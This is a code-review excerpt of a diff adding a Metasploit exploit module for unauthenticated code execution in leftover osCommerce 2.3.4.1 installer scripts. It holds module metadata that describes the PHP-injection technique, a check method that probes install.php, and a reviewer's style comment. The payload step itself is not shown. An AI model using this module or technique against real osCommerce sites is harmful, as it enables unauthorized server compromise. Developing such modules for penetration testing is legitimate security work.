modules/exploits/multi/http/oscommerce.rb

```diff
@@ -0,0 +1,80 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'osCommerce Installer Unauthenticated Code Execution',
+      'Description'    => %q{
+         If the /install/ directory was not removed, it is possible for an unauthenticated
+         attacker to run the "install_4.php" script, which will create the configuration
+         file for the installation. This allows the attacker to inject PHP code into the
+         configuration file and execute it.
+      },
+      'Author'         => [
+        'Simon Scannell',      # Original exploit author
+        'Daniel Teixeira'      # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '44374'],
+        ],
+        'Payload'      =>
+        {
+          'BadChars' => "\x00",
+        },
+       'Privileged' => false,
+       'Platform'   => ['php'],
+       'Arch'       => ARCH_PHP,
+       'Targets' =>
+            [
+                [ 'osCommerce 2.3.4.1', { } ],
+            ],
+      'DisclosureDate' => 'Apr 30 2018',
+      'DefaultTarget' => 0))
+     register_options(
+    [
+      OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(datastore['URI'], 'install.php'),
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
```

Comment:
`Exploit` is redundant in exploit context, and `return` is redundant at the end of a method.

You can simply use `CheckCode::Safe`